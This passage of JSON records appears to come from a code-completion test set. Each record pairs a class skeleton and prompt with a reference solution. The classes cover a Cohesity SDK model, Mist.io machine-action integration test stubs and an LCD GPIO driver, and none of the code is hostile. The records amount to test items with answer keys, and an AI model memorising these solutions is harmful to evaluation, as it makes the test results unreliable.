use_user_specified_passive_preference_order\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExchangeDAGProtectionPreference:\n \"\"\"Implementation of the 'ExchangeDAGProtectionPreference' model. Specifies the information about the preference order while choosing between which database copy of the database which is part of DAG should be protected. Attributes: passive_copy_preference_server_guid_list (list of string): Specifies the preference order of the exchange servers from which passive database copies should be protected. The preference order is descending which indicates that passive database copy in the first server in the list gets the highest preference. passive_only (bool): Specifies that only passive database copies should be protected if this is set to true. If this is set to false, both active and passive data\"\"\"\n\n def __init__(self, passive_copy_preference_server_guid_list=None, passive_only=None, use_user_specified_passive_preference_order=None):\n \"\"\"Constructor for the ExchangeDAGProtectionPreference class\"\"\"\n self.passive_copy_preference_server_guid_list = passive_copy_preference_server_guid_list\n self.passive_only = passive_only\n self.use_user_specified_passive_preference_order = use_user_specified_passive_preference_order\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n passive_copy_preference_server_guid_list = dictionary.get('passiveCopyPreferenceServerGuidList')\n passive_only = dictionary.get('passiveOnly')\n use_user_specified_passive_preference_order = dictionary.get('useUserSpecifiedPassivePreferenceOrder')\n return cls(passive_copy_preference_server_guid_list, passive_only, use_user_specified_passive_preference_order)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/exchange_dag_protection_preference.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "b04e0ffd4350d683d2834df70b4b1d9a01b13361", "bodies": ["create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\nuri = MIST_URL + '/api/v2/machines'\nrequest = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\nmachine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')", "machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\nuri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\nrequest = MistRequests(api_token=owner_api_token, uri=uri)\nrequest_method = getattr(request, 'POST'.lower())\nresponse = request_method()\nif 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\nelse:\n assert_response_ok(response)\nassert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\nprint('Success!!!')"], "bodies_text": "<|body_start_0|>\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_0|>\n\n<|body_start_1|>\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_1|>\n\n<|body_start_2|>\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_2|>\n\n<|body_start_3|>\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_3|>\n\n<|body_start_4|>\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_4|>\n", "class_docstring": "MachinesController integration test stubs", "class_name": "TestMachinesController1", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n <|body_0|>\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n <|body_1|>\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n <|body_2|>\n\n def test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n <|body_3|>\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_0|>\n\n<|body_start_1|>\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_1|>\n\n<|body_start_2|>\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_2|>\n\n<|body_start_3|>\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_3|>\n\n<|body_start_4|>\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000378", "length_bytes": 7528, "license_type": "no_license", "methods": [{"docstring": "Test case for create_machine Create machine", "name": "test_create_machine", "signature": "def test_create_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for reboot_machine Reboot machine", "name": "test_reboot_machine", "signature": "def test_reboot_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for resize_machine Resize machine", "name": "test_resize_machine", "signature": "def test_resize_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for start_machine Start machine", "name": "test_start_machine", "signature": "def test_start_machine(self, pretty_print, owner_api_token)"}, {"docstring": "Test case for stop_machine Stop machine", "name": "test_stop_machine", "signature": "def test_stop_machine(self, pretty_print, owner_api_token)"}], "n_methods": 5, "original_id": "stack_v2_sparse_classes_30k_train_002093", "prompt": "Implement the Python class `TestMachinesController1` described below.\n\nClass description:\nMachinesController integration test stubs\n\nMethod signatures and docstrings:\n- def test_create_machine(self, pretty_print, owner_api_token): Test case for create_machine Create machine\n- def test_reboot_machine(self, pretty_print, owner_api_token): Test case for reboot_machine Reboot machine\n- def test_resize_machine(self, pretty_print, owner_api_token): Test case for resize_machine Resize machine\n- def test_start_machine(self, pretty_print, owner_api_token): Test case for start_machine Start machine\n- def test_stop_machine(self, pretty_print, owner_api_token): Test case for stop_machine Stop machine", "prompted_full_text": "Implement the Python class `TestMachinesController1` described below.\n\nClass description:\nMachinesController integration test stubs\n\nMethod signatures and docstrings:\n- def test_create_machine(self, pretty_print, owner_api_token): Test case for create_machine Create machine\n- def test_reboot_machine(self, pretty_print, owner_api_token): Test case for reboot_machine Reboot machine\n- def test_resize_machine(self, pretty_print, owner_api_token): Test case for resize_machine Resize machine\n- def test_start_machine(self, pretty_print, owner_api_token): Test case for start_machine Start machine\n- def test_stop_machine(self, pretty_print, owner_api_token): Test case for stop_machine Stop machine\n\n<|skeleton|>\nclass TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n <|body_0|>\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n <|body_1|>\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n <|body_2|>\n\n def test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n <|body_3|>\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_0|>\n\n<|body_start_1|>\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_1|>\n\n<|body_start_2|>\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_2|>\n\n<|body_start_3|>\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_3|>\n\n<|body_start_4|>\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n<|end_body_4|>\n", "revision_id": "28a4e128f7de3988452d7a8398438dd22a7113ed", "skeleton": "<|skeleton|>\nclass TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n <|body_0|>\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n <|body_1|>\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n <|body_2|>\n\n def test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n <|body_3|>\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TestMachinesController1:\n \"\"\"MachinesController integration test stubs\"\"\"\n\n def test_create_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for create_machine Create machine\"\"\"\n create_machine_request = setup_data.get('create_machine', {}).get('request_body') or json.loads('{\\n \"template\" : \"{}\",\\n \"image\" : \"Debian\",\\n \"quantity\" : 1.4658129805029452,\\n \"disks\" : {\\n \"disk_size\" : 0,\\n \"disk_path\" : \"disk_path\"\\n },\\n \"fqdn\" : \"fqdn\",\\n \"cloudinit\" : \"cloudinit\",\\n \"volumes\" : \"\",\\n \"save\" : true,\\n \"dry\" : true,\\n \"monitoring\" : true,\\n \"tags\" : \"{}\",\\n \"cloud\" : \"cloud\",\\n \"size\" : \"m1.small\",\\n \"optimize\" : \"optimize\",\\n \"schedules\" : [ \"\", \"\" ],\\n \"extra\" : \"\",\\n \"name\" : \"DB mirror\",\\n \"location\" : \"\",\\n \"expiration\" : {\\n \"date\" : \"2000-01-23T04:56:07.000+00:00\",\\n \"action\" : \"stop\",\\n \"notify\" : {\\n \"period\" : \"minutes\",\\n \"value\" : 1\\n },\\n \"notify_msg\" : \"notify_msg\"\\n },\\n \"net\" : \"\",\\n \"scripts\" : [ \"\", \"\" ],\\n \"key\" : \"\"\\n}', strict=False)\n uri = MIST_URL + '/api/v2/machines'\n request = MistRequests(api_token=owner_api_token, uri=uri, json=create_machine_request)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'create_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'reboot': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_reboot_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for reboot_machine Reboot machine\"\"\"\n machine = setup_data.get('reboot_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/reboot'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'reboot_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_resize_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for resize_machine Resize machine\"\"\"\n query_string = setup_data.get('resize_machine', {}).get('query_string') or [('size', '9417745961a84bffbf6419e5of68faa5')]\n machine = setup_data.get('resize_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/resize'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri, params=query_string)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'resize_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'actions': {'start': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_start_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for start_machine Start machine\"\"\"\n machine = setup_data.get('start_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'running', 'actions': {'stop': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n\n def test_stop_machine(self, pretty_print, owner_api_token):\n \"\"\"Test case for stop_machine Stop machine\"\"\"\n machine = setup_data.get('stop_machine', {}).get('machine') or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + '/api/v2/machines/{machine}/actions/stop'.format(machine=machine)\n request = MistRequests(api_token=owner_api_token, uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'stop_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(api_token=owner_api_token, uri=setup_data['amazon_machine_uri'], data={'state': 'stopped', 'actions': {'resize': True}}, timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')\n", "source": "the_stack_v2_python_sparse", "source_path": "misttests/integration/api/main/v2/test_machines_controller_1.py", "source_repo": "mistio/mist.tests", "split": "test", "star_events_count": 1} {"blob_id": "a982cbd211dae5a7d528a9748bebafcaeaa9e6a1", "bodies": ["self.debug = debug\nself.rs_pin = rs_pin\nself.en_pin = en_pin\nself.pins = pins\nGPIO.setmode(GPIO.BCM)\nif not self.debug:\n GPIO.setwarnings(False)\nGPIO.setup(self.en_pin, GPIO.OUT)\nGPIO.setup(self.rs_pin, GPIO.OUT)\nfor pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\nHD44780.__init__(self, debug=self.debug, **kwargs)", "if self.debug and (not 